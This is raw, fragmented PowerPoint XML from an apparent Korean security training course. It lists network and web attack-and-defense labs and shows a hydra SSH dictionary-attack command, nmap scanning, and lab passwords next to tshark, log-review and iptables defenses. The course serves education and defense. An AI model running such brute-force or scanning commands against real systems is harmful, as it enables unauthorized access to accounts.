          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득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check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645562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/Training/Unit/Sys/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비인가 접근 공격 및 방어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Hydra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도구를 사용하여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test01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계정을 대상으로 사전 공격을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00" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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toor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비인가 접속을 탐지할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비인가 접속을 대응할 수 있다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(CentOS 6)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3646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단위과제 기반 실습체계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FBB328-93E9-4011-A7D7-7D3DC23EF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69" y="5066084"/>
            <a:ext cx="10630230" cy="1325564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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가상화 환경으로 구축되어 운용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실 네트워크 환경과 유사하게 구성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실습 진행에 필요한 네트워크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서버 및 기타 장비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정보보호체계 등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가 가상화 기반으로 구현되어 있음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6880E82-60CF-498B-9AE3-1AE274B2F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7" y="1690688"/>
            <a:ext cx="7450666" cy="325502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화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump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5216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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>터미널 실행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ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 공격 서버가 위치한 네트워크 주소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ifconfig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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 네트워크 스캔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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10.10.1.0/24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476688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4) hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 사전 공격 수행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hydra –l test01 –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/share/wordlists/rockyou.txt ssh://10.10.1.14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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>획득한 계정 정보로 로그인 시도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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>test01@10.10.1.14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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료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exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 205">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641E41BC-2181-4A24-9860-CB1DE03DC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20" y="1077806"/>
            <a:ext cx="4963668" cy="2660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07">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD3FC64-78B4-4FEF-ADFF-317B4E741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20" y="4247726"/>
            <a:ext cx="4963668" cy="1936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09">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E0EAF3-BD00-4E24-917C-541DE2C73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340" y="841586"/>
            <a:ext cx="4932299" cy="190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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9784306D-6D5E-4942-8586-70E08559B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340" y="3194366"/>
            <a:ext cx="4563491" cy="143129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2B0B64-EE1D-4AE6-9057-DB2AD754F4B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5212080"/>
            <a:ext cx="5616792" cy="127691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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호 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acheck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test123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347054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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{681B9CBF-A5B3-468D-8635-097A577D3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hlinkClick r:id="rId3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/Training/Unit/Sys/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비인가 접근 공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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귀하는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Linux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관리자로서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서버에 원격 접속하는 사용자를 모니터링 하고자 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tshark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라는 패킷 분석 툴을 이용하여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원격접속을 시도 중인 프로토콜과 사용자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정보를 탐지하고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공격이 의심되는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차단하시오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1)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tshark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패킷 카운터 및 저장 명령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tshark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–c 200 –w packet.txt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2)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tshark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패킷 확인 명령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tshark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–w packet.txt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3) iptables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차단 명령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iptables -A INPUT -s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차단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IP] -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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비인가 접속을 탐지할 수 있다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계정 비인가 접속을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(CentOS 6)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286648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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>보안 로그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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 원격접속 패킷 저장 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tail /var/log/secure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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 로그인 시도를 하고 있음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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 계정의 비밀번호 변경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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># passwd test01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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>무작위 공격 시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단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iptables –A INPUT –s IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 213">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6AC6CE-5568-40D0-9A0E-7CBAEA27D1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00" b="50518"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="1077475"/>
            <a:ext cx="4941294" cy="137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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3226F2-D95F-4C7A-A031-E5395AF94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29" y="3213138"/>
            <a:ext cx="5001641" cy="80454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7" name="Picture 217">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A4D9A2-400E-4443-9DFF-059E3D027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3" y="4521715"/>
            <a:ext cx="4954016" cy="176784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FCE32E-C979-4B56-9233-FE6E734747D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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check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72431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781E677B-FFEB-44EC-B488-2C8509CC9B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2505375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1798320" y="1550471"/>
          <a:ext cx="8563556" cy="5171313"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="871996">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4065764">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289816008"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2749103288"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="217882782"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2341448737"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1876509">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1029884743"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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링크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교육내용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선행 이론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실습 시 사용 프로그램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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1228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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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실습 구성도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611002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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3" action="ppaction://hlinksldjump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NIS(+)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제한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WireShark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1018819"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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텔넷 서비스 제한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WireShark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815923"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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Finger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제한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mailx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35430"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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스팸 메일 릴레이 서비스 제한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WireShark, OpenSSL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932795"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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OpenSSL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취약점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WireShark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890630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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 통제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WireShark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097071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FTP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패킷 탐지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nmap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651176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스캔 공격 및 방어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hping3, WireShark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133713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ARP Spoofing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hping3, WireShark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401460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 Spoofing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518544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DNS Spoofing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hping3,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WireShark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top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12555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SYN Flooding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hping3, WireShark, iftop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318716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Ping of Death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Saddam.py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19258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DNS Amplification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slowhttptest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319792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Slowloris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slowhttptest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527480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RUDY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snort, iptables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915602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정보보호체계 정책 설정 및 로그 분석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hunt-1.5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401317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TCP Session Hijacking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ettercap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etterfilter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3178460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MITM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429381"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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id="{75E8C096-FA1A-4B00-8D9B-648A1C7B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네트워크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문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2B21831-8B7B-4EC5-AA23-95145270147B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0705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/Training/Unit/Net/0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 0.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실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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51630866-C6A1-45FD-AF61-E871A6EFF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69" y="5486400"/>
            <a:ext cx="10630230" cy="905247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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네트워크 실습</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 219">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE03927-5141-4536-ACA1-DC9479CA7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477" y="1706862"/>
            <a:ext cx="5224861" cy="3597574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2195454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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. NIS(+) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서비스 제한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NIS(Network Information Service)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ypserv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라고 불리는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RPC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서비스로서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portmap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및 다른 관련 서비스들과 함께 사용되어 동일한 도메인에 위치한 컴퓨터에 사용자명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암호와 다른 기밀 정보를 배포하는 기능을 합니다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이 서비스는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ypserv.securenets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파일이 공백으로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비어있거나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파일이 존재하지 않는 경우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NIS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모든 네트워크를 청취하기 때문에 보안에 취약합니다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귀하는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ypserv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10.10.1.0~127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범위안의 네트워크에서만 수용 할 수 있도록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ypserv.securenets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수정하시오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1) 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ypserv.securenets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 수정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ypserv.securenets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파일이 공백으로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비어있거나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파일이 존재하지 않는 경우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NIS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모든 네트워크를 청취한다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ypserv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적절한 네트워크에서 들어오는 요청만 응답하도록 넷마스크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쌍을 입력해줘야 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NIS, NIS+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제한 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 Linux / 10.10.1.166)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(CentOS 6.5 / 10.10.1.133)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump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0" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11F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1744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1) 10.10.1.166(NIS Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(PW : toor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # ssh root@10.10.1.166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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20171223-DF75-40D6-9C77-50F646767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52" b="2449"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="846887"/>
            <a:ext cx="5224441" cy="188041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21700589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073139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781E677B-FFEB-44EC-B488-2C8509CC9B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2577097"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="2138868"/>
          <a:ext cx="8563556" cy="3201289"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="871996">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4065764">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289816008"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2749103288"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349858">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="217882782"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="349857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2341448737"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1876509">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1029884743"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2341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링크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교육내용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선행 이론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실습 시 사용 프로그램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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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실습 구성도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T1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611002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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 Injection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및 방어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Wireshark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1018819"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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취약점 직접 객체 참조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Directory Listing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취약점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Wireshark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815923"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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취약점 직접 객체 참조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다운로드 취약점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Wireshark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35430"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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민감 데이터 노출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Wireshark,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Openssl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932795"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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 및 세션 관리 취약점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Wireshark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890630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12284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수준의 접근 통제 누락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Wireshark,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Webshell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097071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검증되지 않은 리 다이렉트 및 포워드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Wireshark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651176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XSS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및 방어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Wireshark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133713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크로스 사이트 요청 변조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(CSRF)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및 방어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Wireshark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401460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알려진 취약점이 있는 컴포넌트 사용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Wireshark, bash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518544"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23410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 설정 오류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Wireshark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12555"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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id="{75E8C096-FA1A-4B00-8D9B-648A1C7B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/Training/Unit/Web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웹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문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2B21831-8B7B-4EC5-AA23-95145270147B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3795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/Training/Unit/Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 0.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실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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51630866-C6A1-45FD-AF61-E871A6EFF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2568" y="1797549"/>
            <a:ext cx="4463112" cy="4427675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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웹 실습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가즈아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7" name="Picture 222">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A931CF-DED8-48DD-A0E3-FD16E8E2E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97549"/>
            <a:ext cx="5400040" cy="459409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61254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시나리오 기반 실습체계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FBB328-93E9-4011-A7D7-7D3DC23EF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69" y="5430740"/>
            <a:ext cx="10630230" cy="960907"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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해당 환경에서 시나리오에 기반한 연속적인 침해행위들을 발생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0" indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000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교육생들이 해당 침해행위들에 대한 대응과정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실습과제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을 실습합니다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E8E4F6BF-6CAF-4148-A75E-D301FE116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71" y="1690688"/>
            <a:ext cx="7061858" cy="359985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화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AFEC2E0-DA0B-4212-8980-BCA7FEFAE1EC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9438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/Training/Unit/Web/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방어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공격자는 현재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injection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공격이 통하는 취약한 서버를 확인하였다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취약한 로그인 페이지를 통해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injection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하여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admin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으로 로그인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toor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피해 웹 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http://web.navy.mil.kr/webhack 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SQL Injection(Command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유형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탐지할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SQL Injection(Command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유형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(Kali)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(CentOS 6)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
